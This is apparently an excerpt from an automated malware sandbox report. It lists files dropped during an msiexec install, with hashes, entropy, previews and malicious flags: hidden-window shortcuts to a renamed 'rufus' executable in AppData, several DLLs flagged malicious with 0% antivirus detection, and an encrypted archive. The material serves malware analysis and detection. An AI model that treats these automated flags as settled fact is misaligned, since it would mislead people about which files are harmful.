                                                                                                                                                                                          SHA-512:3FFBBA2E4CD689F362378F6B0F6060571F57E228D3755BDD308283BE6CBBEF8C2E84BEB5FCF73E0C3C81CD944D01EE3FCF141733C4D8B3B0162E543E0B9F3E63
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:Copyright (c) Electron contributors.Copyright (c) 2013-2020 GitHub Inc...Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the."Software"), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND.NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE.LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION.OF CONTRACT, TORT OR OTHERWISE, ARISIN
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=0, Archive, ctime=Sat Mar 8 06:57:16 2025, mtime=Tue Mar 25 19:01:55 2025, atime=Sat Mar 8 06:57:16 2025, length=1622832, window=hide
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):2109
                                                                                                                                                                                          Entropy (8bit):3.8854872834980223
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24:8qfs8AZREjKjqbdt9p+SlEd6n8AU1sWlvk6OwwblnacPcdu1bH6OwwblnacP3vJO:8qx1jKjqbdt99auq85BaJdu1bH5BaW
                                                                                                                                                                                          MD5:0DD46F10B39D7C9278B0CA289BFF14DD
                                                                                                                                                                                          SHA1:5EC2ED5A6D55287C836FAA21391D4E73A485C75D
                                                                                                                                                                                          SHA-256:DB90F13957032F966840DC846EC4159191C12D421426EF14F56B92570C7CC806
                                                                                                                                                                                          SHA-512:8B3D1122D5BA2B7A067601A9F2E5151D972E53E908964AD81C061A668C6DCE9945C84D4BC54689711300334FEAA2B8710AA5D868B20082891A589AD1EE59252E
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:L..................F.@.. .....`...............`.....0.......................H.:..DG..Yr?.D..U..k0.&...&...... M.............w~.........t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlyZ6.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....yZ:...Roaming.@......DWSlyZ:.....C......................:.R.o.a.m.i.n.g.....\.1.....yZ:...TASOVC~1..D......yZ:.yZ:............................:.T.a.s.o.v.C.o.o.p.....n.1.....yZ<...KLIOVE~1..V......yZ:.yZ<.....X......................Y.K.l.i.o. .V.e.r.f.a.i.r. .T.o.o.l.s.....j.2.0...hZ(? .RUFUS-~1.EXE..N......hZ(?yZ<.....nC........................r.u.f.u.s.-.4...6.p...e.x.e.......z...............-.......y..............e.....C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\rufus-4.6p.exe......\.r.u.f.u.s.-.4...6.p...e.x.e.=.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.T.a.s.o.v.C.o.o.p.\.K.l.i.o. .V.e.r.f.a.i.r. .T.o.o.l.s.\.h.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.R.o.a.m.
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=0, Archive, ctime=Sat Mar 8 06:57:16 2025, mtime=Tue Mar 25 19:01:55 2025, atime=Sat Mar 8 06:57:16 2025, length=1622832, window=hide
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):2109
                                                                                                                                                                                          Entropy (8bit):3.8854872834980223
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24:8qfs8AZREjKjqbdt9p+SlEd6n8AU1sWlvk6OwwblnacPcdu1bH6OwwblnacP3vJO:8qx1jKjqbdt99auq85BaJdu1bH5BaW
                                                                                                                                                                                          MD5:0DD46F10B39D7C9278B0CA289BFF14DD
                                                                                                                                                                                          SHA1:5EC2ED5A6D55287C836FAA21391D4E73A485C75D
                                                                                                                                                                                          SHA-256:DB90F13957032F966840DC846EC4159191C12D421426EF14F56B92570C7CC806
                                                                                                                                                                                          SHA-512:8B3D1122D5BA2B7A067601A9F2E5151D972E53E908964AD81C061A668C6DCE9945C84D4BC54689711300334FEAA2B8710AA5D868B20082891A589AD1EE59252E
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:L..................F.@.. .....`...............`.....0.......................H.:..DG..Yr?.D..U..k0.&...&...... M.............w~.........t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlyZ6.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....yZ:...Roaming.@......DWSlyZ:.....C......................:.R.o.a.m.i.n.g.....\.1.....yZ:...TASOVC~1..D......yZ:.yZ:............................:.T.a.s.o.v.C.o.o.p.....n.1.....yZ<...KLIOVE~1..V......yZ:.yZ<.....X......................Y.K.l.i.o. .V.e.r.f.a.i.r. .T.o.o.l.s.....j.2.0...hZ(? .RUFUS-~1.EXE..N......hZ(?yZ<.....nC........................r.u.f.u.s.-.4...6.p...e.x.e.......z...............-.......y..............e.....C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\rufus-4.6p.exe......\.r.u.f.u.s.-.4...6.p...e.x.e.=.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.T.a.s.o.v.C.o.o.p.\.K.l.i.o. .V.e.r.f.a.i.r. .T.o.o.l.s.\.h.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.R.o.a.m.
                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exe
                                                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1900
                                                                                                                                                                                          Entropy (8bit):5.180248730416717
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:48:bsGMk3jjseCLuvkkKtY/K0iswT415VPv4CBzqjZB:AGMk3kehkkKtY/Fix4BvvqB
                                                                                                                                                                                          MD5:9ED21E577A97042CD77162F3C62E053B
                                                                                                                                                                                          SHA1:6A8C0394CAC21AC5A0DF62F9609B3210A43EC73F
                                                                                                                                                                                          SHA-256:C7303B352078613D9BCD814223C4DA0E71B5F867FB5EE8C44342CA6871B9397B
                                                                                                                                                                                          SHA-512:C0118F6DE579A292085E3F87A13C10F3B5615DC8DFE1EFAA656B88DB6EEF9AC532B654982CF96C408E149EC2747BE5E89A1793178B7C0FA1935A8FEB56A852A6
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:.# For documentation, see https://www.sumatrapdfreader.org/settings/settings3-5-1.html..Theme = Light..FixedPageUI [...TextColor = #000000...BackgroundColor = #ffffff...SelectionColor = #f5fc0c...WindowMargin = 2 4 2 4...PageSpacing = 4 4...InvertColors = false...HideScrollbars = false..]..ComicBookUI [...WindowMargin = 0 0 0 0...PageSpacing = 4 4...CbxMangaMode = false..]..ChmUI [...UseFixedPageUI = false..]....SelectionHandlers [..]..ExternalViewers [..]....ZoomLevels = 8.33 12.5 18 25 33.33 50 66.67 75 100 125 150 200 300 400 600 800 1000 1200 1600 2000 2400 3200 4800 6400..ZoomIncrement = 0....PrinterDefaults [...PrintScale = shrink..]..ForwardSearch [...HighlightOffset = 0...HighlightWidth = 15...HighlightColor = #6581ff...HighlightPermanent = false..]..Annotations [...HighlightColor = #ffff00...UnderlineColor = #00ff00...SquigglyColor = #ff00ff...StrikeOutColor = #ff0000...FreeTextColor = ...FreeTextSize = 12...FreeTextBorderWidth = 1...TextIconColor = ...TextIconType = ...Defa
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):138488
                                                                                                                                                                                          Entropy (8bit):5.92047745641961
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3072:7g1SuZHbpYkExO4R7/c1GKvf1O+vOQD63NzFW1BUBPBP7UulBJegBwn4aqtdVeac:7B27pQQD63VFW1BUBPBP7UulfAX
                                                                                                                                                                                          MD5:0DE5F0DC500841DEAACF7E6E1F651314
                                                                                                                                                                                          SHA1:D7DA1A79DFE54B4F2A37943476C73D0AAAE002A9
                                                                                                                                                                                          SHA-256:F172CDEB17A218BF27F371AE22DD6EBB6EE0E9D0470462FEB9B6D68E0D50B623
                                                                                                                                                                                          SHA-512:55D7E9C272DA604369DC8C1E1730DF41BEE75D786AE1D5A1B94230B42CF16CE825B2FA26C1B5BA6D5FDED345E46A88DD88B60D7109C0D8A2CC6CCDCAA480E9CD
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................t....................Rich............................PE..L...w..]...........!......................... ............................... .......Q....@..........................................0...................0........... ..T............................................................................text............................... ..`.rdata..8.... ......................@..@.rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):129776
                                                                                                                                                                                          Entropy (8bit):6.136389553753588
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3072:Js1SuZHbpYkExO4R7/c1GKvf1O+vOQD63NzFW1BUBPBP7UulBJnkwwpb:JV27pQQD63VFW1BUBPBP7UulYFb
                                                                                                                                                                                          MD5:BB0A95F980C536257863BE7FE103E8A8
                                                                                                                                                                                          SHA1:04C8E4BC9AC7B31F76DE8D418FB32590E45D29FC
                                                                                                                                                                                          SHA-256:49D4E8DF3D4749266E273161FCA487567F2D794BB0B3371A85BC3FC8784500DB
                                                                                                                                                                                          SHA-512:29540BF0F6ECB2715B4655FF85262C2BE362CC446ADC7F3B411F959D8EE23242F791AF9FB6463B6D735E844C580DB695CA1B6962E17E2746DF67447A3AEC2432
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................t....................Rich............................PE..L...y..]...........!......................... .......................................l....@..........................................0...................0........... ..T............................................................................text............................... ..`.rdata..<.... ......................@..@.rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):135416
                                                                                                                                                                                          Entropy (8bit):5.940222683224963
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3072:ih1SuZHbpYkExO4R7/c1GKvf1O+vOQD63NzFW1BUBPBP7UulBJ4nD6P12sEc:i+27pQQD63VFW1BUBPBP7Uulr1B
                                                                                                                                                                                          MD5:6248DA5B425B537375F2C5590B6CDC88
                                                                                                                                                                                          SHA1:B36243C72E95F22F831E2643153A2F3DCB84D843
                                                                                                                                                                                          SHA-256:71C7BFA4E384ECA9F0B4ECFB7B9C3886FDFD30A5175C9307E149F99F9D28307C
                                                                                                                                                                                          SHA-512:64D0475BC732FB5447642BBEB0038D86086E9786084285C0FAC0A502F085514BF72C23D76F56C0DC299C78F444DF9FBAB95A5C4274CF16101D686E11807C8497
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................t....................Rich............................PE..L...s..]...........!......................... .......................................W....@..........................................0...................0........... ..T............................................................................text............................... ..`.rdata..<.... ......................@..@.rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):97912
                                                                                                                                                                                          Entropy (8bit):6.490070406573042
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:1536:pLwFszBXepc8QfsZDCz4NsFssPhRSgN7ih7K4cDbQISsWWcdLn9VAVTxqVbrt73J:tw0Buu81ZDCrFsSuwcUUIcLn9VAVTx6X
                                                                                                                                                                                          MD5:702A43B46118CF2D93EB7EFBF2847E20
                                                                                                                                                                                          SHA1:AE7D7CF0C205654FAA631741337AAB42D90CBC8D
                                                                                                                                                                                          SHA-256:2284E0A8A33395B4115DF68F9FFEDF3DBA22D992441E391B54E7ADA52A7D67AE
                                                                                                                                                                                          SHA-512:DCA24E415E1A0F14F851E4FCA1669246B2CA16B2840609BEA9809BE88D577E996602B14865B1F4E4D1CC24A4C5D9E4C721347F6A5313D27FB23C542369927439
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........2}..\...\...\...]/..\...]...\..._/..\...Y/m.\...X/..\...Y/..\...X/..\..._/..\.Q.Y/..\.Q.\/..\.Q.....\.Q.^/..\.Rich..\.................PE..L......c...........!................ ...............................................Cu....@A.........................;......p<..P....p.. ............V..x(......P.......T...........................H/..@............................................text............................... ..`.rdata..de.......f..................@..@.data........P.......4..............@....rsrc... ....p.......>..............@..@.reloc..P............F..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):46712
                                                                                                                                                                                          Entropy (8bit):6.657273919208583
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:5rjsGdggJoHTiirl0EdcPo8xAdWDWS4WJvssKUFtk3Yi3+PxWEoFa:5rQ0j2HOip0EdcP2dWDWovFKIs73+PxZ
                                                                                                                                                                                          MD5:DB2561776C0E056D013E6538CE405773
                                                                                                                                                                                          SHA1:246EBC0A9956A8BD1BB98A2A0A5EC5938619ACF8
                                                                                                                                                                                          SHA-256:77DD991B444DABF2952F72717896849E9B7F94B3BFC8337DB1DE13BAFD6936D1
                                                                                                                                                                                          SHA-512:BD9B8A27D1153C2E58922B6E3532C98B3F8B8D4A65863DEBDF51C715BE66AA4E0947F4C10B9DCF65A20E889DE7A3BE186769DADA6E18754A750A5B42A65D751C
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........L..-.-.-..X.-.U].-..X.-.Ub..-..X...-..X...-..X.-..\.-.-..-..X...-..X.-..X...-..X.-.Rich.-.................PE..L...h..c...........!.....R...:......@........p...........................................@A................................l...........H...............x(..............T...........................p...@............p..h............................text...MQ.......R.................. ..`.rdata...$...p...&...V..............@..@.data................|..............@....rsrc...H............~..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):154426
                                                                                                                                                                                          Entropy (8bit):7.915623092881329
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3072:AzwJCGIekwENgMBsFAXg6VKdL2o418Gb0+VRLf0ld0GY3cQ3ERVm2I:Azw1IekmMBdQXK18Gb0OV8ld0GecQ3Ey
                                                                                                                                                                                          MD5:B1BCCF31FA5710207026D373EDD96161
                                                                                                                                                                                          SHA1:AE7BB0C083AEA838DF1D78D61B54FB76C9A1182E
                                                                                                                                                                                          SHA-256:49AFF5690CB9B0F54F831351AA0F64416BA180A0C4891A859FA7294E81E9C8E3
                                                                                                                                                                                          SHA-512:134A13AD86F8BD20A1D2350236269FD39C306389A600556A82025D5E0D5ADAAB0709D59E9B7EE96E8E2D25B6DF49FEFEA27CDCCEFE5FBA9687ABF92A9A941D91
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:..........?.........C.......................m.......................^.....X.................q".....$....1/.....9.....<.....A....^D.....F.....H....FK....6M....fO.....S.....V..(..Z..)..[..+..\..-..^....._..5.k`..6..f..8..l..9..n..:..q..;..u..<..x..=..{..>.A...?.....@.h...A.....B.....C.....D.....F....e.....j.[...k.Y...l.....m.....n.....o....p.&...q.U...r....................................................R.........B........................@....."....,.../...1....:....<....@...>E...NP....Q...3Z....a....mf.....k.....r....it.....x.....|....a......................]................c.................................................................^...........b...........t...........=.....k... .....".^...#.....(.^...*.3...+.....,.....D.....E.....F.~...G.....H.....I.Y...J.-...K.....L.....M.....N.1...O.....P.....Q.....R.....S.....T..!..U..'..W.\-..X.8...Y.....Z../..[..0..\.J1..]..1..^.53.._.+4..`. 5..c..9..D..=..E.>>..F..>..G..>..H..?..I..@..J..A..K..A..L..B..M.qB..N..B
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):235060
                                                                                                                                                                                          Entropy (8bit):7.947114238566176
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:6144:gDQYaSN6svydrI8jDQUgx5GMRejnbdZnVE6YoppO4:NfSN6svydZ6edhVELoXO4
                                                                                                                                                                                          MD5:E02160C24B8077B36FF06DC05A9DF057
                                                                                                                                                                                          SHA1:FC722E071CE9CAF52AD9A463C90FC2319AA6C790
                                                                                                                                                                                          SHA-256:4D5B51F720F7D3146E131C54A6F75E4E826C61B2FF15C8955F6D6DD15BEDF106
                                                                                                                                                                                          SHA-512:1BF873B89B571974537B685CDB739F8ED148F710F6F24F0F362F8B6BB605996FCFEC1501411F2CB2DF374D5FDAF6E2DAAADA8CEA68051E3C10A67030EA25929E
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:..........?.........J..........................................%.....*.....-....\5.....9.....A.....E....IZ.....o....(t.....~.........s...........e...........L.....p.....y...(.3...).....+.....-..........5.....6.1...8.....9.=...:.....;.....<.t...=.$...>.....?.....@.....A.....B.....C.(...D..%..F..)..e.?1..j..6..k./9..l..<..m..J..n.WN..o.|Z..p..f..q..k..r..l.....m.....q.....t.....w.....z....'~....D........................J..............#.............a....&...................V............c........".....'....n-....P4.....6.....:.....>....6H....bK.....S.....W....ba.....k.....o.....q....cz......................................5...........p.....G..................................%....."... .@...".Y...#.....(.K...*.|...+.r...,.R...D.5...E.c...F.}...G.....H.\...I.....J.b...K.....L.f...M.....N.w...O.9 ..P.'%..Q..-..R..4..S..;..T..A..U..F..W..L..X..M..Y..N..Z..P..[.)Q..\.JR..].>S..^..U.._..V..`.pX..c.4e..D..u..E..u..F..u..G.Kv..H..v..I.,x..J..y..K.[y..L..y..M..z..N.mz
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):4916712
                                                                                                                                                                                          Entropy (8bit):6.398049523846958
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:49152:KCZnRO4XyM53Rkq4ypQqdoRpmruVNYvkaRwvhiD0N+YEzI4og/RfzHLeHTRhFRNc:xG2QCwmHPnog/pzHAo/A6l
                                                                                                                                                                                          MD5:2191E768CC2E19009DAD20DC999135A3
                                                                                                                                                                                          SHA1:F49A46BA0E954E657AAED1C9019A53D194272B6A
                                                                                                                                                                                          SHA-256:7353F25DC5CF84D09894E3E0461CEF0E56799ADBC617FCE37620CA67240B547D
                                                                                                                                                                                          SHA-512:5ADCB00162F284C16EC78016D301FC11559DD0A781FFBEFF822DB22EFBED168B11D7E5586EA82388E9503B0C7D3740CF2A08E243877F5319202491C8A641C970
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........|3..]...]...]..e\...]...\.5.]..e...]..wX...]..wY...]..e^...]..eX.y.]..eY...]..e]...]..eU./.]..e....]..e_...].Rich..].................PE..d...^.}`.........." ......8..........<).......................................K.....:FK...`A........................................`%G.x....(G.P.....J.@.....H.......J..%....J.....p.D.p....................S<.(...pR<.@............S<.(............................text.....8.......8................. ..`.rdata...F....8..P....8.............@..@.data...`....@G......@G.............@....pdata........H......@H.............@..@.rsrc...@.....J......@J.............@..@.reloc........J......PJ.............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):2866176
                                                                                                                                                                                          Entropy (8bit):6.716396017186281
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:49152:I9T1onpO0KVy2xq6To8i4BZy7+niuoen6yfzv9x0WFJDI:4pKNMo8rBYinp/FFJM
                                                                                                                                                                                          MD5:11C389CC5A6CEC7C4FA9BCB86DE6DE87
                                                                                                                                                                                          SHA1:470098523B4DD697A057396D66D92318B093DE53
                                                                                                                                                                                          SHA-256:3B3A96B84155B550A072D7E2690F06514413BF6F181E5F8F71C080218293D46E
                                                                                                                                                                                          SHA-512:2BF746A143831623383800DC74428037DDF37C250D2323E44A2AA9696B8B4DEC3804BD751B9FA1B92E82F8595AE409B0C0092F2463C99874798D9FC29E90A6B4
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......f.........." ......".........0.........................................u...........`A..........................................).......).(.............t.4.............u.,4..<.)..................... .).(...P.".@...........(.).P............................text...U."......."................. ..`.rdata.......".......".............@..@.data.....I...*.."...~*.............@....pdata..4.....t.......*.............@..@.gxfg....,...@u......R+.............@..@.retplne.....pu.......+..................tls..........u.......+.............@..._RDATA..\.....u.......+.............@..@.reloc..,4....u..6....+.............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):26896
                                                                                                                                                                                          Entropy (8bit):6.761125048848625
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:384:dBMIJU7DXfFntVeWz8j7EHmH5Ks+fn1RGPiIYiBpxRGz/V1VF0hXHMGBk7/UMQ3R:dBGwySZ+f1RGHYi3urV1VaXLkjM
                                                                                                                                                                                          MD5:F4E99FEDB1CE5EECE90E2546548E8EA1
                                                                                                                                                                                          SHA1:864C21B4D292EAC94D6EAA58F64BAF8C33381F78
                                                                                                                                                                                          SHA-256:0C104F1B89283AA93331F3B8C50747FCE6ABFA7F51ED840FDFA732D658CF0D70
                                                                                                                                                                                          SHA-512:F73E3EAE64472D400CDF7FCC8B804520D6C38D81BAB40305D934A3DFB5CF7CBE7EC08C86CBB9A252B2368EE8A1AF6B3FF6B69084132B6ED7A4AEDB0B5CE3647C
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........gZ........................................................t......%..............t.......t.......t...............t.......Rich............................PE..L...K..a...........!......... .......!.......0.......................................?....@A.........................8..L....9.......`..8............>...+...p..l....3..p...........................(4..@............0...............................text...d........................... ..`.rdata.......0....... ..............@..@.data........P.......2..............@....rsrc...8....`.......4..............@..@.reloc..l....p.......:..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):20600
                                                                                                                                                                                          Entropy (8bit):6.729103879547736
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:384:RPq4jFeU2FhuDutIYiBpx2XgXPxh8E9VF0NyHlMB:pXeUYUHYi3UXOPxWExqB
                                                                                                                                                                                          MD5:D2114276A1E3FAFCE6A51450B6AC4BF3
                                                                                                                                                                                          SHA1:A9E18DF5A2635F0006E326F528453BCAFBB68D54
                                                                                                                                                                                          SHA-256:7B15B97923C7504D8C33D54FED68CDEEAAD03787FE7445C6859B7206F40B708B
                                                                                                                                                                                          SHA-512:E27B99FEEBC7EB4B5303F239C1D3091E3295A5F81E14B887AF77144534BA5B97D52BA441F6544427CFF5E8AC043CD01CCDFB9676CAD2F044841C4D78719CF370
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y..................O......O......O......O.....................<.............................Rich...........PE..L...K..a...........!......................... ...............................`.......q....@A.........................&......`'..d....@...............(..x(...P..X....!..p...........................H"..@............ ..t............................text...t........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@....... ..............@..@.reloc..X....P.......&..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:RAR archive data, v5
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):570574
                                                                                                                                                                                          Entropy (8bit):7.9996584579638474
                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                          SSDEEP:12288:WkvS6wjrT0uoJKJpKvZM5XZobsRqHbTqKx1KpJ/aEuDF0:W0uo8J+ZMnpoHqKx1KpZ+0
                                                                                                                                                                                          MD5:BC359252312314F172CB04D4841F31A2
                                                                                                                                                                                          SHA1:F05ED5D73A3AECE9695161DA40B70791E74F0C06
                                                                                                                                                                                          SHA-256:DC5089184832A3F179EF1B772B6EB48B43210A86A9542763DF72B4FDB2674A91
                                                                                                                                                                                          SHA-512:AA9ACCFD992B2B9661585C5AED93A82E5839EE16523F185EF3FE6FD66CF22A3060E91D508B4D787228221BC1FD59CFEA77328FE846DFD0982ACC29E13AADC1C5
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:Rar!.....s..!......P.s.T.R.U.._.a....?...z....9.......M.I.8...5....xf~#..e..+n.M2...^...y.."..%.....l>L....#..x..8...........x..-..i..=|a $.g?."....Y..[......*....V..'..[..e.....K.2.mQ...C.K.....m..&.....D$&.TK..Q....\S/....O...WP...R....j[.8).5q...z....$.....5q@.Yu.0.l..5.f.7.....y....R..<...yPp>..ktQ..z.'.r.9.....Z.A..Tu.....*...A...$}....:.......c.b..4.....L'.z..)...]..-..T.....L,.q...a...s.../...!5.....`.t.{.qiB..1.4J.l4q...o...Z=.jK..b......BF0.?..U.jZ....%..@]...T..w..0.LB..vz..%..o.^)9 .xE.......j-...`Q.......k.P....5...l....w!R....@....}...:7.O...E`G.e...8.s.....v..E..}..D/b....B.M...Q5.I5..]..~3.....ZZ......G.-...!B..j..'..9..\g}.....`..p.5.Y..~..l..'d.%.e.8A.;]Ec.S.5..[..v......*.....0......W.l.U....f.........X...o......g..!..kL.,'.f.{....;..4.....F...N...E...S++:...I.6[.p.$..rJ...9...{.8Lt.N.?-t.l.<...".\<....so.(..8_;q*..m.......v..4.Eiy......t,.K.e.n.}....$..~..eK.8d.$..........~...~4..H.....)..6tH...QM....[.Zo.&
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):16065496
                                                                                                                                                                                          Entropy (8bit):7.0278259579196165
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:393216:Y6OPZedL1pUAuPXiuZ08RBCxXJq3oeNy8x:KedJp9uPXiuZ08RBCxXJxWy8x
